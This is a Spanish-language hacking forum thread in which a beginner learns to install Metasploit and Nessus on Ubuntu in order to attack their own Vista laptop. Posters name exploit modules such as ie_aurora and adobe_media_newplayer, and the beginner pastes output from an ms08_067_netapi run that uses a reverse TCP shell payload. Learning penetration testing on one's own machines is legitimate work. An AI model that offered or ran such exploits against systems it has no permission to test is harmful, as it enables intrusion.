Foro de elhacker.net

hola, soy bastante nuevo en este tema, asi q perdonar si digo alguna tonteria :D
he visto cosillas (tutoriales ,videos, etc) de gente utilizando metasploit.
segun creo entender, con esto te puedes hacer con el control de un ordenador que este en la misma red lan.
no se si es sencillo de utilizar (porque luego te pones a seguir tutoriales y siempre fallan mil cosas) pero me gustaria saber si es solo para   xp    o si tb  se utiliza de igual modo y sirve para el vista, ya que en todos los tutoriales q he visto  siempre sale con el xp.
un saludo

Shell root you are there??

Yo lo he probado en XP, la verdad Vista no me gusta.

Saludos

hola, muchas gracias por tu respuesta.
aunque no lo hayas probado en vista, porque no te guste, (a mi tampoco me gusta nada) sabes si sirve para vista de igual modo?
es complejo de manejar,instalar,etc?
muchas gracias de nuevo
un saludo

La verdad no tengo ni idea si funcione en vista. Pero si funciona en Windows 7

http://www.metasploit.com/redmine/projects/framework/wiki/Install_Windows

Sobre lo demas que preguntas, yo la verdad no lo uso mucho, solo algunas veces, y no es tan dificil, solo hay que saber que es lo que estas haciendo.

Otra cosa no solo sirve para una red LAN, sirve para cualquier equipo conectado a internet y se encuentre con una dirección publica.
No solo explota a sistemas windows, sin embargo la mayoría de los explots son para windows.

Saludos

en windows 7 no jala muy bien.. ya que... como que esta "encerrado" por el firewall y no puede hacer los ataques bien...

jajajaja

---

Con tu duda, he probado el MSF en WinXP, Win7, Ubuntu. En vista no, por la misma razón de Anon. Pero supongo que debe ser igual (Siguiente, Siguiente, Siguiente, Aceptar... :P)

---

WTF!  :silbar:

pero como q no son solo redes lan   :o :o :o  estas diciendo que tu puedes tomar el control de un ordenador solo con saber su ip¿?¿?¿
porque vamos  me dejarias flipando...
y sobre lo de ubuntu...   pero no se supone que linux es mas seguro y q es muy dificil que te hagan cosas (virus, etc)
muchas gracias de nuevo

ahhhhhhhhh!!!!!!!!!!!
una cosa mas...  cuando digo  si el metasploit sirve para vista  como para xp, no se si me explique algo mal, pero queria decir, si yo con mi ubuntu  y el metaspoit,  si puedo hacerme con el control de un ordenador que tengo con el vista instalado.
creo q ahora me explique mejor  :D
un saludo

Ya entendi mejor, mira con metasploit puedes obtener el control de prácticamente cualquier equipo si y solo si este equipo junto con su Sistema Operativo tiene una vulnerabilidad que sea aprovechable y ademas si existe un exploit que sea capas de aprovechar dicha vulnerabilidad y que ese exploits este ya portado a metasploit

Saludos

muchas gracias por tu aclaracion.
si estuve hablando con alguien q controla de esto tb   y me aclaro ciertas dudas que tenia en cuanto a como funcionaba esto, mas o menos lo q me has dicho tu
otra cosa, ya q estoy pensando en probar esto (aunq creo q manejar estas cosas es bastante complejo y no sere capaz) de donde me puedo bajar el metasploit ,un sitio que no tenga  virus  o no se...  q sea bueno¿?  porque estuve buscando  y hay mil sitios y mil metasploit, y no se muy bien como empezar.
yo utilizo ubuntu  y la makina que quiero controlar  es mi portatil que tiene el vista.tengo q bajar o instalar algo en concreto   o bajo  para linux   y ya trae todo el programa¿?¿
muchas gracias

Si instalas el BackTrack 4, trae la herramientas para auditorias, en este caso, estamos hablando del Metasploit. Ahora, para descargar el Metasploit, descargalo desde la web oficial http://www.metasploit.com/framework/download/ (http://www.metasploit.com/framework/download/), aunque puede que te Reconozco como virus, pero si piensas bien, tiene exploit's como el ie_aurora que es reconocido por multiples antivirus, ademas de ser una Hacking Tool.

Respecto a tu primera duda, de infectar un ordenador con sistema operativo Windows Vista, es posible hacer, intentad con el exploit windows/fileformat/adobe_media_newplayer, windows/browser/ie_aurora, entre otros...

Saludos!

ya habia leido post tuyos, y se nota que controlas de cojones de este tema :D
muchas gracias por tu respuesta, intentare instalarlo siguiendo estas instrucciones, aunq me parecen muchas :D  pero creo q para instalarlo en ubuntu 9.04 tengo q seguirlas al pie de la letra:

http://www.metasploit.com/redmine/projects/framework/wiki/Install_Ubuntu

lo unico q leyendolas hay una sección que se llama:

Database support
In order to use the database functionality, RubyGems along with the appropriate drivers must be installed:
$ sudo apt-get install rubygems libsqlite3-dev
$ sudo gem install sqlite3-ruby
Or for MySQL:
$ sudo apt-get install rubygems libmysqlclient-dev
$ sudo gem install mysql

y no se si tengo que instalar lo de arriba   o lo que pone apartir de   OR FOR MYSQL,  o si tengo q instalar ambos.
estoy en lo cierto y para instalarlo tengo q hacer esto¿?¿?¿  (es la ultima version )
muchas gracias

Con metaexploit o a la vieja escula que es programando tus propios exploit, siempre ha sido asi

beholdthe, el metasploit esta hecho en Ruby, asi que necesitas tenerlo instalado dentro del S.O, instalalo así: (Desde los repositorios)

Despues necesitas instalar el Nmap. (Desde los repositorios)

Despues te descargas el framework-3.3.3.tar.bz2 (http://www.metasploit.com/releases/framework-3.3.3.tar.bz2), ahora ejecutamos:

Nos posicionamos dentro de la carpeta que se creo al descpmprimir el .tar.gz, y lo ejecutamos así:


Ahora lo de MySQL, es un complemento para crear bases de datos de las vulnerabilidades encontradas en un scanneo. Más info:
http://foro.elhacker.net/hacking_basico/metasploit_nessus_pasar_resultado_de_escaneo_de_nessus_al_msf-t279697.0.html
http://foro.elhacker.net/hacking_basico/nmap_metasploit_pasar_resultado_de_escaneo_de_nmap_al_msf-t279852.0.html

Saludos!

En freebsd no tengo mucho problema  ;-)


Instala todo de manera recursiva ya saben dependencias de dependencias de ....

Saludos

perdon por tardar tanto en contestar
entonces que me sugieres, que lo instale mejor asi como me dices tu, o q siga los pasos de la pagina oficial que puse en el enlace¿?¡
si me sirve los comandos q me has dado tu par instalar la ultima version del metasploit  en mi ubuntu 9.04   perfecto, cuando tenga un ratito intentare instalarlo y ver que tal funciona, aunq dudo q sea tan facil y seguramente me de mil problemas como siempre :D:D
muchas gracias

Eso lo decides tú

---

Emm así lo hicé en Ubuntu 9.10

es q no entiendo mucho , pero igual al yo tener la version 9.04  me da algun problema si lo hago como tu dices...
si sigo lo de la pagina, lo de msql  tb lo instalo, o sin el puedo utilizar metasploit trankilamente igual q haces tu en tus videos ( que estoy viendo a ver si me entero de algo :D :D )
muchas gracias

hola de nuevo.
estoy siguiendo un INCREIBLE tutorial de una pagina (no se si esta permitido poner paginas de otros sitios):

http://comunidad.dragonjar.org/f184/tutorial-conociendo-metasploit-framework-en-construccion-rcart-8627/

q no se quien habra echo este tuto pero mis felicitaciones.
y como no se quien lo ha echo me voy a dirigir a shellroot...
estoy siguiendolo y va genial, no me esta dando ningun fallo, pero en el paso de :

Botón para establecer la conexión
Botón para agregar la conexión. En este paso nos parecerá la venta “Edit conexion”.

Aquí tendrán que establecer los datos que aparecen en la imagen. Los mas importantes son el host y el port, tienen que ser iguales al los de la imagen (si es que no se ha modificado el archivo de configuración),
Escriben el nombre y pass del usuario que agregaron como “administrador” y luego le dan en Save. Luego la seleccionan y le dan en Connect. Les aparecerá un mensaje informando que es la primera conexión y le dan en Ok.

en los valores q salen  es:

host name: 0.0.0.0

port:1241

con estos valores no me va, de pone algo de ip  o no se que (mi ingles es bastante malo)
se te ocurren otros valores q pueda meter para q me funcione¿?¿?¿
muchas gracias de nuevo por todo

exactamente me dice esto:

It was not possible to connect to the remote host - make sure the host IP and port are correct and that the Nessus Server service is running

he probado a ponerle mi ip  192.168.1.101  y nada
tb probe la 127.0.0.1  y nada  :(:(:(  ya no se me ocurre porque puede passar...
gracias

Mira, el Creado de ese Tutorial es Rcart de Portal Hacker

Ahora con respecto a tu duda de conexion con el Nessus, deben de ser esos valores, ya que son los que estan en el archivo de configuracion del Nessus. Si quereis cambiadlos tendras que modificar ese archivo.

Recordad:

perdon, creia q eras tu.
con respecto a:

Cita de: https://discussions.nessus.org/message/2642
I had actually downgraded to Version 4.0.0 already to resolve the issue, but I'm sure that would fix my problem. Thanks for pointing that out.


he intentado mirar q es o a q hace referencia, pero no se que hacer, debe de ser de actualizar algo  o no se...   pero sinceramente  no tengo ni idea de que hacer ahora para solucionarlo :(:(
muchas gracias

ah  debe de ser  en vez de poner una version mayor  una mas antigua para q funcione  o algo asi no¿?¡  downgraded    pero no se q comando poner o como hacerlo :(
gracias de nuevo

la version de nessus q he instalado es:
Nessus-4.2.0-ubuntu810_i386.deb

y el nessus client:

NessusClient-4.0.2-ubuntu810_i386

seguramente este ahi el problema  no¿?¿'  ahora...  como lo soluciono¿?¿  :D:D

Exacto ese es el problema! xD Tenes una version superior a la del Cliente de Nessus.
La version Nessus 4.2.0, se usa por medio del browser.

q es eso de q se usa por el browser¿?¿?
es por comandos  en terminal o algo asi¿?¿
donde puedo buscar informacion  o si tienes un tutorial tan bueno como el q estaba siguiendo
muchas gracais ded nuevo shellroot

Con Browser, quiero decir, que se utiliza en una interfaz WEB. No recuerdo como es para ingresar al Scanner, pero es https://localhost:puerto (https://localhost:puerto). Lo que no recuerdo en este momento es el PORT...  :silbar:

sera la 1241  q es la tipica q utiliza¡?¿
probare y te comento

Lo encontre es... https://localhost:8834 (https://localhost:8834). Recordad conectate por https a tu propio pc (localhost o 127.0.0.1) en el puerto 8834, que es donde esta corriendo la interfaz de Nessus.

joder  yo no se donde encontrais las cosas  :D:D:D llevo 2 horas buscando (bueno no tantas :D:D ) loo pruebo y te comento

bien  he conseguido entrar, lo malo es q ahora no se donde darle  para poder seguir el tutorial de la pagina de dragon jar  :(:(:(
conoces de algun sitio donde haya algun tutorial de el nessus  a traves de web¿?¿
gracias por toda la ayuda q me estas dando tio...

Dudo que exista un tutorial de eso. Pero intentad Googlear un poco  :silbar:

lo intento creeme  :D:D:D   pero no veo la luz al final del tunel.
he visto un video en youtube  pero no se si me servira de mucho.
en modo terminal se puede tb manejar el nessus¿?¿'   
lo digo porque por ahi  quizas si haya algun sitio donde pongan algun comando  para ahcer el scan...
muchas gracias

] Started reverse handler on 192.168.1.33:4444

• Automatically detecting the target...
• Fingerprint: Windows Vista Home Premium Service Pack 2 - lang:Unknown
• Could not determine the exact language pack
• Exploit completed, but no session was created.

msf exploit(ms08_067_netapi) >


creo q ya he avanzado bastante :D:D  aunq estoy muy perdido aun...
segun me han dicho exploto bien  pero no se porque razon  no creo una sesion...
pero segui el tutorial ese  y consegui esto.
como lo puedo solucionar¿?¿ 
utilice el   set PAYLOAD windows/shell/reverse_tcp
si utilizo otros  puede darme mejores resultados?¿?¡
otra cosa , haciendo el escaner con nessus  me dio 14 vulnerabilidades   entre ellas el puerto  445  q es la q intente hacer,  pero si queiro probar otras  como se q utilizar en metasploit¿?¿   MEDIENTA  LA   ID¿?¿?¡     algun sitio q de informacion de esto¿?¡
mil gracias de nuevo

El Nessus dá la referencia de la vulnerabilidad, intentad realizando un Search Nombre_Vulnerabilidad. Y con respecto tu primera duda, mirad que no pudó encontrar el Lenguaje del Sistema.

Mirad http://www.pentester.es/2009/11/por-que-no-consigo-shell-con-mi.html